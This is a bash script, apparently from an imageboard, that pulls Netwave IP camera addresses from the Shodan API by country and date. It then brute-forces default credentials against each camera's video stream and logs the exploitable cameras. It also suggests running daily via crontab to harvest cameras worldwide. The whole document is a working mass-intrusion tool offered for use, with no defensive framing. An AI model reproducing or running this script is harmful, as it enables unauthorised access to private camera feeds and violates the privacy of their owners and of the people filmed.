Shodan IPCam Extractor 2.0

1. #!/bin/bash
2. #
3. # Shodan IPCam Extractor 2.0 by Arsouill3 @ 8ch.net/ipcam/
4. #
5. # Last update : 31/10/2015
6. #
7. # Shodan IPCam Extractor 2.0 allows you to download IP (of IPCam) from Shodan.io, thanks to its API, and to test default credentials. Then all exploitable IPCam are saved in bruteforce.log.
8. # For that purpose, you'll need to subscribe either Developer or Freelancer plan (https://developer.shodan.io/billing/signup).
9. # cURL (http://curl.haxx.se/download.html) and jq (https://stedolan.github.io/jq/download/) are required.
10. # The script has been written to get all IP (of IPCam) all over the world on a daily basis. If you want to do so, then edit crontab (crontab -e) as follow : * 20 * * * PATH/shodan_ipcam_extractor.sh $country_iso_2letters $date (script will be launched #everyday at 8 p.m.)
11. # A sample of credentials.txt here : http://pastebin.com/NmQQ6w37
12. #
13. # ./shodan_ipcam_extractor.sh $country_iso_2letters $date :
14. #   * $country_iso_2letters : Alpha-2 code of a country (https://www.iso.org/obp/ui/#search) | all
15. #   * $date : all | y (stands for yesterday)
16.  
17. api_key="" # Paste your Shodan's API key here
18. country=$1
19. date=$2
20. today=$(date +'%s')
21. shodan_today=$(date --date="@$today" "+%d/%m/%Y")
22. yesterday=$(($today-24*3600))
23. bfyesterday=$(($yesterday-24*3600))
24. shodan_bfyesterday=$(date --date="@$bfyesterday" "+%d/%m/%Y")
25. query1="netwave ip camera country:$country before:$shodan_today after:$shodan_bfyesterday" # Download all IPCam of $country posted on yesterday ; $country!=all and $date=y
26. query2="netwave ip camera country:$country" # Download all IPCam of $country ; $country!=all and $date=all
27. query3="netwave ip camera" # Download all IPCam ; $country=all and $date=all
28. query4="netwave ip camera before:$shodan_today after:$shodan_bfyesterday" # Download all IPCam posted yesterday ; $country=all and $date=y
29.  
30. if [ ! -d "./JSON_files" ]
31. then
32.     mkdir "./JSON_files"
33. fi
34. if [ ! -f "./shodan_ip.txt" ]
35. then
36.     touch "./shodan_ip.txt"
37. fi
38.  
39. function collect_ip { # collect_ip $api_key $query
40. i=1
41. nbr_ip=1
42. while [ "$nbr_ip" -gt "0" ]
43. do
44.     code_status=$(curl -L -w "%{http_code}" "https://api.shodan.io/shodan/host/search?key=$1&query=$2&page=$i" -o ./JSON_files/shodan_$i.json)
45.     if [ "$code_status" -ne "200" ]
46.     then
47.         echo "Error ! Maybe a lack of credit ? $(date "+%c")" >> ./error_shodan.log
48.         nbr_ip=0
49.         i=$(($i+1))
50.     else
51.         nbr_ip=$(jq '.matches | length' < ./JSON_files/shodan_$i.json)
52.         i=$(($i+1))
53.     fi
54. done
55. i=$(($i-1))
56. rm "./JSON_files/shodan_$i.json"
57. }
58.  
59. function extract_ip {
60. nbr_files=$(ls ./JSON_files/ | wc -l)
61. if [ "$nbr_files" -gt "0" ]
62. then
63.     for (( j=1; $j<=$nbr_files; j++ ))
64.     do
65.         nbr_ip=$(jq '.matches | length' < ./JSON_files/shodan_$j.json)
66.         for (( i=0; $i<=$nbr_ip-1; i++ ))
67.         do
68.             ip=$(jq --raw-output .matches[$i].ip_str < ./JSON_files/shodan_$j.json)
69.             printf "%s\n" "$ip" >> ./shodan_ip.txt
70.         done
71.     rm "./JSON_files/shodan_$j.json"
72.     echo "File $j processed."
73.     done
74. else
75.     echo "JSON_files directory is empty !"
76.     exit
77. fi
78.  
79. # Split shodan_ip.txt into files of 4000 lines max each
80. nbr_line_ip=$(wc -l ./shodan_ip.txt | sed 's/^\(.*\) \..*/\1/')
81. split=$(($nbr_line_ip/4000)) # 4000 is nearly the max quantity of IP to prevent Joe's FileDownloader of crashing...
82. for (( i=1; $i<=$split; i++ ))
83. do
84.     j=$((4000*$i-3999))
85.     k=$((4000*$i))
86.     sed -n -e $j,$k'p' ./shodan_ip.txt > ./shodan_ip_$i.txt
87. done
88. sed -n -e $(($k+1)),'$p' ./shodan_ip.txt > ./shodan_ip_$i.txt
89. }
90.  
91. # Beginning of "main"
92. if [ "$country" = "all" ]
93. then
94.     if [ "$date" = "all" ]
95.     then
96.         collect_ip $api_key $query3
97.         extract_ip
98.     else
99.         collect_ip $api_key $query4
100.         extract_ip
101.     fi
102. else
103.     if [ "$date" = "y" ]
104.     then
105.         collect_ip $api_key $query1
106.         extract_ip
107.     else
108.         collect_ip $api_key $query2
109.         extract_ip
110.     fi 
111. fi
112.  
113. # Try all credentials of crendentials.txt. They should imperatively be of the form admin:psw (no spaces, one per line). A sample here : http://pastebin.com/NmQQ6w37
114. while read ip
115. do
116.     while read credential
117.     do
118.         admin=$(echo $credential | sed 's/^\(.*\):.*$/\1/')
119.         psw=$(echo $credential | sed 's/^.*:\(.*\)$/\1/')
120.         code_status=$(curl -sL -m 10 -w "%{http_code}" "http://$ip/videostream.cgi?user=$admin&pwd=$psw" -o /dev/null)
121.         if [ "$code_status" = "200" ]
122.         then
123.             echo "http://$ip/ - $admin:$psw" >> ./bruteforce.log
124.         fi
125.     done < ./credentials.txt
126. done < ./shodan_ip.txt